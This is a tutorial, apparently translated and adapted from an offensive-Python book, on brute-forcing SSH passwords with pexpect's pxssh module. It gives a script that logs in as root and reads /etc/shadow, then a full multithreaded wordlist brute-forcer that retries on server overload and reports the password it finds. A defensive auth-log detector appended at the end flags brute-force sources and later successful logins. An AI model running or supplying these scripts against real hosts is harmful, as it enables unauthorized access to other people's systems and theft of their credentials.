Contents
1. Brute-forcing SSH passwords with Pxssh
1.1 Functions
1.2 Simplifying with Pxssh
1.3 Functions
1.4 Automation
1.1 Functions
prompt(): a method in the JavaScript language, mainly used to display a prompt dialog box. In pxssh, the prompt() used in the scripts below instead waits for the remote shell prompt to appear.
pxssh: a Python module for making remote SSH connections, running commands and returning the results. It does not support Windows.
1.2 Simplifying with Pxssh
The script can be simplified further with Pxssh. Pxssh is a specialized script that ships with the pexpect library. It provides ready-made functions such as login(), logout() and prompt() for interacting with SSH directly. Using Pxssh, the previous script can be reduced to:
```python
import sys

from pexpect import pxssh


def send_command(s, cmd):
    # Send the command, wait for the shell prompt, then print the output
    s.sendline(cmd)
    s.prompt()
    print(s.before.decode(errors='replace'))


def connect(host, user, password):
    try:
        s = pxssh.pxssh()
        s.login(host, user, password)
        return s
    except Exception:
        print('[-] Error Connecting')
        sys.exit(0)


s = connect('127.0.0.1', 'root', 'toor')
send_command(s, 'cat /etc/shadow | grep root')
```
1.3 Functions
BoundedSemaphore(n): at most n threads can access a given resource at the same time
global: declares a variable as global
release: releases the lock
add_option: adds a command-line option
acquire: a built-in method of the Lock class in Python's threading module
Thread: a thread of execution in the program
1.4 Automation
With a few more modifications, the script can automate brute-forcing an SSH password. Apart from adding some argument-parsing code to read the hostname, the user name and the file containing the passwords to try, only the connect() function needs a slight change.
If login() succeeds without throwing an exception, the script prints a message saying that the password has been found and sets the global Boolean that records this to true. Otherwise the exception is caught. If the exception shows that the password was rejected, the password is known to be wrong and the function simply returns. However, if the exception shows that the socket error is "read_nonblocking", the SSH server may have been overwhelmed by the number of connections, so the script waits a moment and tries the same password again. Likewise, if the exception shows that pxssh had trouble extracting the command prompt, the script waits for a while and then retries.
The connect() function takes a Boolean parameter, release. Because connect() can call itself recursively, only the connect() call that was not made recursively may release the connection_lock semaphore.
```python
import optparse
import sys
import time
from threading import BoundedSemaphore, Thread

from pexpect import pxssh

maxConnections = 5
connection_lock = BoundedSemaphore(value=maxConnections)
Found = False
Fails = 0


def connect(host, user, password, release):
    global Found
    global Fails
    try:
        s = pxssh.pxssh()
        s.login(host, user, password)
        print('[+] Password Found: ' + password)
        Found = True
    except Exception as e:
        if 'read_nonblocking' in str(e):
            # Server may be overloaded: wait, then retry the same password
            Fails += 1
            time.sleep(5)
            connect(host, user, password, False)
        elif 'synchronize with original prompt' in str(e):
            # pxssh could not extract the prompt: wait, then retry
            time.sleep(1)
            connect(host, user, password, False)
    finally:
        # Only the non-recursive call releases the semaphore
        if release:
            connection_lock.release()


def main():
    parser = optparse.OptionParser(
        'usage %prog -H <target host> -u <user> -F <password list>')
    parser.add_option('-H', dest='tgtHost', type='string',
                      help='specify target host')
    parser.add_option('-F', dest='passwdFile', type='string',
                      help='specify password file')
    parser.add_option('-u', dest='user', type='string',
                      help='specify the user')
    (options, args) = parser.parse_args()
    host = options.tgtHost
    passwdFile = options.passwdFile
    user = options.user
    if host is None or passwdFile is None or user is None:
        print(parser.usage)
        sys.exit(0)
    with open(passwdFile, 'r') as fn:
        for line in fn:
            if Found:
                print("[*] Exiting: Password Found")
                sys.exit(0)
            if Fails > 5:
                print("[!] Exiting: Too Many Socket Timeouts")
                sys.exit(0)
            # Blocks while maxConnections attempts are already in flight
            connection_lock.acquire()
            password = line.strip('\r').strip('\n')
            print("[-] Testing: " + str(password))
            t = Thread(target=connect, args=(host, user, password, True))
            t.start()


if __name__ == '__main__':
    main()
```
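The defender's view of the script above, as an added example that is not part of the original page: the threaded guessing it performs appears in sshd's auth log as a burst of "Failed password" lines from one source, which this code flags, along with any login from that source that succeeds afterwards. The log lines are constructed, and the function name find_bruteforce, the threshold/window defaults and the year argument (classic syslog timestamps carry no year) are assumptions made for illustration.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sshd auth-log lines (documentation addresses, not real hosts).
SAMPLE_LOG = """\
Mar 10 12:00:01 host sshd[101]: Failed password for root from 203.0.113.5 port 40001 ssh2
Mar 10 12:00:02 host sshd[102]: Failed password for root from 203.0.113.5 port 40002 ssh2
Mar 10 12:00:02 host sshd[103]: Failed password for root from 203.0.113.5 port 40003 ssh2
Mar 10 12:00:03 host sshd[104]: Failed password for root from 203.0.113.5 port 40004 ssh2
Mar 10 12:00:04 host sshd[105]: Failed password for invalid user admin from 198.51.100.7 port 50000 ssh2
Mar 10 12:00:05 host sshd[106]: Failed password for root from 203.0.113.5 port 40005 ssh2
Mar 10 12:00:09 host sshd[107]: Accepted password for alice from 198.51.100.7 port 50001 ssh2
Mar 10 12:00:11 host sshd[108]: Accepted password for root from 203.0.113.5 port 40006 ssh2
"""

LINE_RE = re.compile(
    r"^(\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(Failed|Accepted) password for (?:invalid user )?(\S+) from (\S+) port \d+")

def find_bruteforce(log_text, threshold=5, window=timedelta(seconds=60), year=2024):
    """Flag source IPs with `threshold` failed logins inside `window`.
    Returns {ip: {"failures": total, "compromised": [users logged in after flagging]}}."""
    recent = defaultdict(deque)  # ip -> failure timestamps still inside the window
    totals = defaultdict(int)    # ip -> all failures seen
    flagged = {}
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        stamp, outcome, user, ip = m.groups()
        ts = datetime.strptime(f"{year} {stamp}", "%Y %b %d %H:%M:%S")
        if outcome == "Failed":
            totals[ip] += 1
            q = recent[ip]
            q.append(ts)
            while ts - q[0] > window:
                q.popleft()
            if len(q) >= threshold:
                flagged.setdefault(ip, {"failures": 0, "compromised": []})
        elif ip in flagged:
            # A success from a flagged source means the guessing likely worked.
            flagged[ip]["compromised"].append(user)
    for ip, info in flagged.items():
        info["failures"] = totals[ip]
    return flagged

if __name__ == "__main__":
    print(find_bruteforce(SAMPLE_LOG))
```

A non-empty "compromised" list is the case to escalate first: it means a password login was accepted from a source that had already been flagged for guessing.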